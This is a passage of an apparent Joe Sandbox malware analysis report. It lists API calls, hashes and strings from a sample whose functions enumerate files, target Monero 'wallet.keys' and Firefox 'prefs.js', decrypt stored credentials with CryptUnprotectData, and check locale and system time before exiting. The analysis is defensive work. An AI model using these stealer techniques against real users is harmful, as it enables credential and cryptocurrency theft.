                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: 2062646d6c626bfee2dc7c6cb47957f4f69408d4b8d9466979f902d041c437b8
                    • Instruction ID: 627aeec43b6d1ed737be0b25d8d8db195d0e5e7780e0c86160ac0ab2d4de9f5a
                    • Opcode Fuzzy Hash: 2062646d6c626bfee2dc7c6cb47957f4f69408d4b8d9466979f902d041c437b8
                    • Instruction Fuzzy Hash: C56143B2900218ABDB24EBA0DC49FEE737DBB98701F044598B50D96145EF71DB89CF92
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00644580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00644587
                    • wsprintfA.USER32 ref: 006445A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 006445BD
                    • StrCmpCA.SHLWAPI(?,00650FC4), ref: 006445EB
                    • StrCmpCA.SHLWAPI(?,00650FC8), ref: 00644601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0064468B
                    • FindClose.KERNEL32(000000FF), ref: 006446A0
                    • lstrcat.KERNEL32(?,01450700), ref: 006446C5
                    • lstrcat.KERNEL32(?,0144E820), ref: 006446D8
                    • lstrlen.KERNEL32(?), ref: 006446E5
                    • lstrlen.KERNEL32(?), ref: 006446F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 4e36684cef5cb406ab54c2792b0e406eda2f882628e02453229832c93c44e2e6
                    • Instruction ID: e89797f1f58e35113e53832755aa27415a67a8572d30c7bea75ac09437a0ec38
                    • Opcode Fuzzy Hash: 4e36684cef5cb406ab54c2792b0e406eda2f882628e02453229832c93c44e2e6
                    • Instruction Fuzzy Hash: 965133B2540218ABC764EB70DC89FED737DBB94300F404598B64D96194EF74DB858F92
                    APIs
                    • wsprintfA.USER32 ref: 00643EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00643EDA
                    • StrCmpCA.SHLWAPI(?,00650FAC), ref: 00643F08
                    • StrCmpCA.SHLWAPI(?,00650FB0), ref: 00643F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0064406C
                    • FindClose.KERNEL32(000000FF), ref: 00644081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: d270029e71cf40fd46035ac7337dce51cfe7b339c2f52cb13c96ab5703e70edb
                    • Instruction ID: 1842ab588d280aa4296f04f47853f410b46541e4d88a9cc949c468daedc8b518
                    • Opcode Fuzzy Hash: d270029e71cf40fd46035ac7337dce51cfe7b339c2f52cb13c96ab5703e70edb
                    • Instruction Fuzzy Hash: 1D5165B2900218ABCB24FBB0DC89EEE737DBB84300F04459CB65D96144DB75DB898F95
                    APIs
                    • wsprintfA.USER32 ref: 0063ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0063ED55
                    • StrCmpCA.SHLWAPI(?,00651538), ref: 0063EDAB
                    • StrCmpCA.SHLWAPI(?,0065153C), ref: 0063EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0063F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: b80b862158154d8c6b9ce750ce327cc8efafd80b5ee7969fdb262e2dd699ffee
                    • Instruction ID: cbb19e03ddc49f7fe57479f3b2cdcafa2518a09fcf2f041e4137db9e0859bed9
                    • Opcode Fuzzy Hash: b80b862158154d8c6b9ce750ce327cc8efafd80b5ee7969fdb262e2dd699ffee
                    • Instruction Fuzzy Hash: D6E1E471951118BAFB94FBA0DC52EEE733AEF55300F41459DB40A62092EE306F8ACF95
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006515B8,00650D96), ref: 0063F71E
                    • StrCmpCA.SHLWAPI(?,006515BC), ref: 0063F76F
                    • StrCmpCA.SHLWAPI(?,006515C0), ref: 0063F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0063FAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: fea76e658e1e7a969efa6c6aea8e338b197abb67f69aee44472992c5850d04eb
                    • Instruction ID: 9703b0b2b453680bc236acb9f17aefbcd69473201947a1f447797d1621d3fc90
                    • Opcode Fuzzy Hash: fea76e658e1e7a969efa6c6aea8e338b197abb67f69aee44472992c5850d04eb
                    • Instruction Fuzzy Hash: E5B13571940108AFDB64FFA0DC56BEE737AAF95300F4085ACA40A96191EF309B49CF96
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0065510C,?,?,?,006551B4,?,?,00000000,?,00000000), ref: 00631923
                    • StrCmpCA.SHLWAPI(?,0065525C), ref: 00631973
                    • StrCmpCA.SHLWAPI(?,00655304), ref: 00631989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00631D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00631DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00631E20
                    • FindClose.KERNEL32(000000FF), ref: 00631E32
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: 190f40d228e1a6ce7d27e7aa95888db5adab876ad39bda3a0ad71b10fcf7db05
                    • Instruction ID: 66b38383483ce25ecb10308d05766b4c572aef99fe45be3393ce99cbf22b0649
                    • Opcode Fuzzy Hash: 190f40d228e1a6ce7d27e7aa95888db5adab876ad39bda3a0ad71b10fcf7db05
                    • Instruction Fuzzy Hash: A5127F71851118BBEB59FBA0CC96EEE733AAF55300F41419DB50A62091EF306F89CFA5
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00650C2E), ref: 0063DE5E
                    • StrCmpCA.SHLWAPI(?,006514C8), ref: 0063DEAE
                    • StrCmpCA.SHLWAPI(?,006514CC), ref: 0063DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0063E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: 3f7403b940c6f3ea2eb04b240ee64b0747480b76f2144218075abdba3d181cbf
                    • Instruction ID: 019105930a5780859ef9148e71a6ea87fb5f8279d65b5d42d57046779b1ae679
                    • Opcode Fuzzy Hash: 3f7403b940c6f3ea2eb04b240ee64b0747480b76f2144218075abdba3d181cbf
                    • Instruction Fuzzy Hash: F3F1E071854118AEEB59EBA0CC95EEE733AFF55300F4141DDA40A62091EF306F8ACF66
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006514B0,00650C2A), ref: 0063DAEB
                    • StrCmpCA.SHLWAPI(?,006514B4), ref: 0063DB33
                    • StrCmpCA.SHLWAPI(?,006514B8), ref: 0063DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0063DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: d3e7f3fc3b20e2eac8c0d4420e6767957013d92e61efdb9e5d3a35ee049f9e99
                    • Instruction ID: 64baf465ba31d846a4b7aa91f9796b483608312ec28b5c2d419c8b71e84d8ac0
                    • Opcode Fuzzy Hash: d3e7f3fc3b20e2eac8c0d4420e6767957013d92e61efdb9e5d3a35ee049f9e99
                    • Instruction Fuzzy Hash: B49150B6900104ABDB54FBB0EC569ED737FAF85300F41866CF80A96181EE34DB498BD6
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,006505AF), ref: 00647BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00647BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00647C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00647C62
                    • LocalFree.KERNEL32(00000000), ref: 00647D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: 52e677dec0942ff00b33d799cf648fe161413f24ea9b4356baa50397b49897f2
                    • Instruction ID: c6fac26da4827f325565db59b41f13778d7bb644987ee34c2717251307e94d86
                    • Opcode Fuzzy Hash: 52e677dec0942ff00b33d799cf648fe161413f24ea9b4356baa50397b49897f2
                    • Instruction Fuzzy Hash: 24416B71940218AFDB64DB94DC89BEEB37AFF44700F204199E40962281DB346F85CFA5
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00650D73), ref: 0063E4A2
                    • StrCmpCA.SHLWAPI(?,006514F8), ref: 0063E4F2
                    • StrCmpCA.SHLWAPI(?,006514FC), ref: 0063E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: 462a78a8aac7789b37e5cddb55c36cb7af2e1c5f2b033d6de6e9962c5a3fbf4e
                    • Instruction ID: d434bf8d5feeba569d66d28cd5fc26331f2af0354aac6ad883c4a3c406f18254
                    • Opcode Fuzzy Hash: 462a78a8aac7789b37e5cddb55c36cb7af2e1c5f2b033d6de6e9962c5a3fbf4e
                    • Instruction Fuzzy Hash: 47126671950118BBEB58FBA0DC96EED733AAF54300F41459CB50A56091EF30AF49CFA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                     • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &66$1*u=$:M'$^Z}u$c&;{$}nw
                    • API String ID: 0-175420206
                    • Opcode ID: 18ca08cfb5a006d9e968fb08847b848939d075774de9970ca3ff16378cd28469
                    • Instruction ID: a1a63f26c158804065d63292a8a7b301f83e3555cb9832fba8b15ca1a2805110
                    • Opcode Fuzzy Hash: 18ca08cfb5a006d9e968fb08847b848939d075774de9970ca3ff16378cd28469
                    • Instruction Fuzzy Hash: 77B217F3A0C2049FE304AE2DEC8577ABBE9EF94320F16493DE6C5C7744EA3558058696
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00634EEE,00000000,?), ref: 00639B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639B2A
                    • LocalFree.KERNEL32(?,?,?,?,00634EEE,00000000,?), ref: 00639B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: Nc
                    • API String ID: 4291131564-1584449269
                    • Opcode ID: ba69f8a60e6cace0ceacd91667e9918e0f5f0dd38a4bfb01ededb5fa382b524b
                    • Instruction ID: 3157fdd68158a3d448c90e6b245e0e94d905042ff28b3c48d42719e1ef038e43
                    • Opcode Fuzzy Hash: ba69f8a60e6cace0ceacd91667e9918e0f5f0dd38a4bfb01ededb5fa382b524b
                    • Instruction Fuzzy Hash: 9311A4B4240208EFEB14CF64DC95FAAB7B5FB89700F208058F9199B394C7B5A941CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &~s_$Lr;$Qpxo$j<?$9}>
                    • API String ID: 0-1819094296
                    • Opcode ID: 327861af2dc46d414808862f827a86bc41520d6ff083247159adb71312c3fe81
                    • Instruction ID: d46c7d38ce323c8bbda585d040dc995abd49e2d0882b62995a4c16c837ba1374
                    • Opcode Fuzzy Hash: 327861af2dc46d414808862f827a86bc41520d6ff083247159adb71312c3fe81
                    • Instruction Fuzzy Hash: DAB2F6F3A082009FE704AE2DDC8567AB7E5EFD4720F1A893DE6C5C3744EA3598058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #G~m$&+u$0o[w$oaCY$n}o
                    • API String ID: 0-1092153006
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0063C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0063C87C
                    • lstrcat.KERNEL32(?,00650B46), ref: 0063C943
                    • lstrcat.KERNEL32(?,00650B47), ref: 0063C957
                    • lstrcat.KERNEL32(?,00650B4E), ref: 0063C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 0064696C
                    • sscanf.NTDLL ref: 00646999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006469B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006469C0
                    • ExitProcess.KERNEL32 ref: 006469DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0063724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00637254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00637281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006372A4
                    • LocalFree.KERNEL32(?), ref: 006372AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    APIs
